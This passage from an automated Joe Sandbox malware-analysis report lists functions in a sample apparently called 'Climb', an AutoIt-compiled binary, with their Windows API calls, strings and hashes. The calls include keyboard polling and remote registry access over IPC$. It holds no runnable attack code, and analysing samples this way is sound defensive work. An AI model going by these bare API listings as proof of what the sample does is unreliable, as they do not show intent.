Instruction Fuzzy Hash: B55150B0B00215AFDF08CF69CD89AAEBBB5FB58315F118129F919E7290D774AD04CB60

Function 00482128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00482234: GetWindowLongW.USER32(?,000000EB), ref: 00482242

GetSysColor.USER32(0000000F), ref: 00482152

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 67c53145428fbbf563f2af503d07ae0be1e8e3551f3a2757aaf1a71c0a87e07d
Instruction ID: aba2875cc68ea6088dc99dcfb8817c194c04b17d47e357ef3bbffd47c0628698
Opcode Fuzzy Hash: 67c53145428fbbf563f2af503d07ae0be1e8e3551f3a2757aaf1a71c0a87e07d
Instruction Fuzzy Hash: 4941F935240640BFDB206F388C48FBE7775AB51331F248A5AFAA2872E1C7758D42E725

Function 004813A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 004C28D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004C28EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004C28FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004C2912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004C2933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004811F5,00000000,00000000,00000000,000000FF,00000000), ref: 004C2942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004C295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004811F5,00000000,00000000,00000000,000000FF,00000000), ref: 004C296E

Strings

(U, xrefs: 004C2885

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: (U
API String ID: 1268354404-2725093197
Opcode ID: 474a2ac0bf320836c25ab1ef0d0b726f8e8f269787ea9e11b563d49c267d10df
Instruction ID: a024a58a025ecbe63c5609b64f8afb98dd43b0bb9412e477cd7de545d97a0c31
Opcode Fuzzy Hash: 474a2ac0bf320836c25ab1ef0d0b726f8e8f269787ea9e11b563d49c267d10df
Instruction Fuzzy Hash: 5151AB70600309AFDB20EF25CC41FAE7BB9FB58714F10491EF902962A0D7B8E881DB54

Function 0051955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

Part of subcall function 004819CD: GetCursorPos.USER32(?), ref: 004819E1
Part of subcall function 004819CD: ScreenToClient.USER32(00000000,?), ref: 004819FE
Part of subcall function 004819CD: GetAsyncKeyState.USER32(00000001), ref: 00481A23
Part of subcall function 004819CD: GetAsyncKeyState.USER32(00000002), ref: 00481A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 005195C7
ImageList_EndDrag.COMCTL32 ref: 005195CD
ReleaseCapture.USER32 ref: 005195D3
SetWindowTextW.USER32(?,00000000), ref: 0051966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00519681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0051975B

Strings

(U, xrefs: 00519728
(U, xrefs: 0051956D
@GUI_DRAGFILE, xrefs: 005196F6
@GUI_DROPID, xrefs: 005196AD

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$(U$(U
API String ID: 1924731296-3145992212
Opcode ID: 5bcea33e59551a084045d28b628569228e1ebfe5004da603826edea370b01e69
Instruction ID: b1e57864e2a010471196dfafbeb63a65980b8f78ae0c75f3ed907acc27f651fa
Opcode Fuzzy Hash: 5bcea33e59551a084045d28b628569228e1ebfe5004da603826edea370b01e69
Instruction Fuzzy Hash: 15516B70104300AFE704EF11CC6ABAA7BE5FB98715F40091DF955972E1DB749948DB92

Function 004EA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,004D0D31,00000001,0000138C,00000001,00000000,00000001,?,004FEEAE,00552430), ref: 004EA091
LoadStringW.USER32(00000000,?,004D0D31,00000001), ref: 004EA09A

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,004D0D31,00000001,0000138C,00000001,00000000,00000001,?,004FEEAE,00552430,?), ref: 004EA0BC
LoadStringW.USER32(00000000,?,004D0D31,00000001), ref: 004EA0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004EA1E0

Strings

Error: , xrefs: 004EA197
Line %d:, xrefs: 004EA11A
Line %d (File "%s"):, xrefs: 004EA109
%s (%d) : ==> %s: %s %s, xrefs: 004EA1C4
^ ERROR, xrefs: 004EA175

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 3b0f5d8e5ddc61fbc4adae22e740fd5a893e807247aca56ffe118d8533bef460
Instruction ID: 4db19d5da23548ef1ef5d295563854291f71faf2f5f8c0d0c209354790c69c1a
Opcode Fuzzy Hash: 3b0f5d8e5ddc61fbc4adae22e740fd5a893e807247aca56ffe118d8533bef460
Instruction Fuzzy Hash: F941537280011DAACF05FBE2DD46DEEB778EF18309F10446AB501B2092DB796F59CBA5

Function 004E0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00488577: _wcslen.LIBCMT ref: 0048858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004E1093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004E10AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004E10CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004E10F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 004E111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004E1128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004E112D

Strings

\IPC$, xrefs: 004E1075
SOFTWARE\Classes\, xrefs: 004E0FFF
\CLSID, xrefs: 004E1015

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 86e8fc396e8abfdc52b5991948f390bc77d0d447395afc45054baf7bd9bde53e
Instruction ID: d24988af389803e0488f322249922eadcff02bc24a7e794756a60b96ceb25192
Opcode Fuzzy Hash: 86e8fc396e8abfdc52b5991948f390bc77d0d447395afc45054baf7bd9bde53e
Instruction Fuzzy Hash: 91411C72C10229AFCF11EBA5DC45DEEB7B8FF18744F40842AE901A3161EB759E04CB94

Function 00514A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00514AD9
CreateCompatibleDC.GDI32(00000000), ref: 00514AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00514AF3
SelectObject.GDI32(00000000,00000000), ref: 00514AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00514B06
DeleteDC.GDI32(00000000), ref: 00514B10
GetWindowLongW.USER32(?,000000EC), ref: 00514B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00514B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00514B3C

Strings

static, xrefs: 00514A71

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 1f612b23be3ba4416ac8f8b81c81e4e34c41f9af2c25bc3c4ad3aef210a26899
Instruction ID: 1af4cb8429090857130e648b138d511f919fa9e4c41bf4d82bcf6b00e69289c5
Opcode Fuzzy Hash: 1f612b23be3ba4416ac8f8b81c81e4e34c41f9af2c25bc3c4ad3aef210a26899
Instruction Fuzzy Hash: C4314B31140219BBEF119FA5DC08FEA3FA9FF19364F114211FA15A61A0C735D854EBA4

Function 0050468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005046B9
CoInitialize.OLE32(00000000), ref: 005046E7
CoUninitialize.OLE32 ref: 005046F1
_wcslen.LIBCMT ref: 0050478A
GetRunningObjectTable.OLE32(00000000,?), ref: 0050480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00504932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0050496B
CoGetObject.OLE32(?,00000000,00520B64,?), ref: 0050498A
SetErrorMode.KERNEL32(00000000), ref: 0050499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00504A21
VariantClear.OLEAUT32(?), ref: 00504A35

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: c93bf5245fda1d91484963555baace2eec2ab031b0087378adf8cca11ba6f056
Instruction ID: 6a61af9184beafb3601817199ffafc5f84647772fab0bb2ab367f2936726e444
Opcode Fuzzy Hash: c93bf5245fda1d91484963555baace2eec2ab031b0087378adf8cca11ba6f056
Instruction Fuzzy Hash: 21C123B1604201AFC700EF69C88496FBBE9FF89748F00491DFA899B291DB30ED05CB52

Function 004F84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004F8538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004F85D4
SHGetDesktopFolder.SHELL32(?), ref: 004F85E8
CoCreateInstance.OLE32(00520CD4,00000000,00000001,00547E8C,?), ref: 004F8634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004F86B9
CoTaskMemFree.OLE32(?,?), ref: 004F8711
SHBrowseForFolderW.SHELL32(?), ref: 004F879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004F87BF
CoTaskMemFree.OLE32(00000000), ref: 004F87C6
CoTaskMemFree.OLE32(00000000), ref: 004F881B
CoUninitialize.OLE32 ref: 004F8821

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: b0b3f89d74b4f4115d1997f38fe9ed076ecfb96d7134c55013e0468a35eb4912
Instruction ID: 61b5536710c9e1c4a9b13ca2cb2a5b4aaa65ca6ebd809bba01f5fb059fd53fc2
Opcode Fuzzy Hash: b0b3f89d74b4f4115d1997f38fe9ed076ecfb96d7134c55013e0468a35eb4912
Instruction Fuzzy Hash: 38C12A75A00109AFCB14EFA5C888DAEBBF9FF48344B148499E519DB361CB34ED45CB94

Function 004E0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004E039F
SafeArrayAllocData.OLEAUT32(?), ref: 004E03F8
VariantInit.OLEAUT32(?), ref: 004E040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 004E042A
VariantCopy.OLEAUT32(?,?), ref: 004E047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 004E0491
VariantClear.OLEAUT32(?), ref: 004E04A6
SafeArrayDestroyData.OLEAUT32(?), ref: 004E04B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004E04BC
VariantClear.OLEAUT32(?), ref: 004E04CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004E04D9

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 67fac0058b20b4db7ee2acb9b3044b0d16ee4b11c638dad8673f1383e70ca40e
Instruction ID: 5375ffeb53b763d5b5c59fffea2b9c3093854296c46772833bd644956557a42f
Opcode Fuzzy Hash: 67fac0058b20b4db7ee2acb9b3044b0d16ee4b11c638dad8673f1383e70ca40e
Instruction Fuzzy Hash: 5C417335A00219EFCF10DF95D8449EE7BB9FF18345F00842AE915A7261D7B8A985CFA4

Function 004EA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 004EA65D
GetAsyncKeyState.USER32(000000A0), ref: 004EA6DE
GetKeyState.USER32(000000A0), ref: 004EA6F9
GetAsyncKeyState.USER32(000000A1), ref: 004EA713
GetKeyState.USER32(000000A1), ref: 004EA728
GetAsyncKeyState.USER32(00000011), ref: 004EA740
GetKeyState.USER32(00000011), ref: 004EA752
GetAsyncKeyState.USER32(00000012), ref: 004EA76A
GetKeyState.USER32(00000012), ref: 004EA77C
GetAsyncKeyState.USER32(0000005B), ref: 004EA794
GetKeyState.USER32(0000005B), ref: 004EA7A6

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a0c342839010258a6103b077566a950c6de382c140ce7973bf200c4a9d8a5e6e
Instruction ID: a94391df7dc1f393e2458e723af17201ef9476267cd16aff3a3301ebb5307f0f
Opcode Fuzzy Hash: a0c342839010258a6103b077566a950c6de382c140ce7973bf200c4a9d8a5e6e
Instruction Fuzzy Hash: C54183745047C969FF31D76184043A7BEB16F22345F08805BD5C64A7C2EBACE9E88767

Function 00482AB0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00482AF9
OleUninitialize.OLE32(?,00000000), ref: 00482B98
UnregisterHotKey.USER32(?), ref: 00482D7D
DestroyWindow.USER32(?), ref: 004C3A1B
FreeLibrary.KERNEL32(?), ref: 004C3A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004C3AAD

Strings

close all, xrefs: 00482AF4
vGN, xrefs: 00482BE2, 00482CC7

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all$vGN
API String ID: 469580280-4286619809
Opcode ID: 7408f16f25f01919189cdacd8096a25304c1a2f1cecc7cb1e39b3daf6ae99afb
Instruction ID: 09cbc587a9f3968d0db7d9b55cccfb79ff766a801f134f6feebbf9f81ebdbeed
Opcode Fuzzy Hash: 7408f16f25f01919189cdacd8096a25304c1a2f1cecc7cb1e39b3daf6ae99afb
Instruction Fuzzy Hash: 9FD19C347012129FCB59EF15C545F6AF7A0BF04705F1086AFE84A6B262CB79AD12CF48

Function 00509730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00509750

Part of subcall function 004E9805: _wcslen.LIBCMT ref: 004E9828

_wcslen.LIBCMT ref: 005097AB
_wcslen.LIBCMT ref: 005097F9
_wcslen.LIBCMT ref: 00509839
_wcslen.LIBCMT ref: 005098CB

Strings

stdcall, xrefs: 00509833, 00509838
none, xrefs: 005098C2, 005098C7
cdecl, xrefs: 005097A5, 005097AA
winapi, xrefs: 005097F3, 005097F8

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: ce2dde08d12f20a9bd7b6ea0fb2150d2820f44dabe9ace966ac8ea7e79c58a35
Instruction ID: a348a17bf939db268b4a6136d9f23524decf649651ca992dac9a321872bbfe6b
Opcode Fuzzy Hash: ce2dde08d12f20a9bd7b6ea0fb2150d2820f44dabe9ace966ac8ea7e79c58a35
Instruction Fuzzy Hash: B551D531A001169BCB14DF69C9518BEBBE1FF65364B21862EE826E73CAD735DD40C790

Function 00504189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 005041D1
CoUninitialize.OLE32 ref: 005041DC
CoCreateInstance.OLE32(?,00000000,00000017,00520B44,?), ref: 00504236
IIDFromString.OLE32(?,?), ref: 005042A9
VariantInit.OLEAUT32(?), ref: 00504341
VariantClear.OLEAUT32(?), ref: 00504393

Strings

Invalid parameter, xrefs: 005042C2
NULL Pointer assignment, xrefs: 0050427B
Failed to create object, xrefs: 00504241, 005042F7

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 09c476ace73d03ee49ad18c8217467f3f24859ed07def299d27c39aa1daea37b
Instruction ID: c27ffb5547724b2e27c31a3870c46c98968836608e1afbce05753b297388bad0
Opcode Fuzzy Hash: 09c476ace73d03ee49ad18c8217467f3f24859ed07def299d27c39aa1daea37b
Instruction Fuzzy Hash: 1661A0B4608301AFC710DF55D888BAEBBE4BF49714F00491EFA8597291C774ED88CB92

Function 004F8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004F8C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 004F8CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004F8CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004F8D55
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8D69
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004F8DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8DDA

Strings

*.*, xrefs: 004F8DE0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 566963af95c8daad550d6e1015d78064b9bdd2ea1b0af77e2a5077e26ff52fe7
Instruction ID: 6072f7dff810484cd9e4bce6da0afec613b37df77bbd0d95378634ce0066b279
Opcode Fuzzy Hash: 566963af95c8daad550d6e1015d78064b9bdd2ea1b0af77e2a5077e26ff52fe7
Instruction Fuzzy Hash: A8616C725043499FCB10EF61C8449AFB3E8FF99314F04481EFA9987251DB39E945CBA6

Function 005146E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00514715
SetMenu.USER32(?,00000000), ref: 00514724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005147AC
IsMenu.USER32(?), ref: 005147C0
CreatePopupMenu.USER32 ref: 005147CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005147F7
DrawMenuBar.USER32 ref: 005147FF

Strings

0, xrefs: 005146F0
F, xrefs: 005147EA

Memory Dump Source

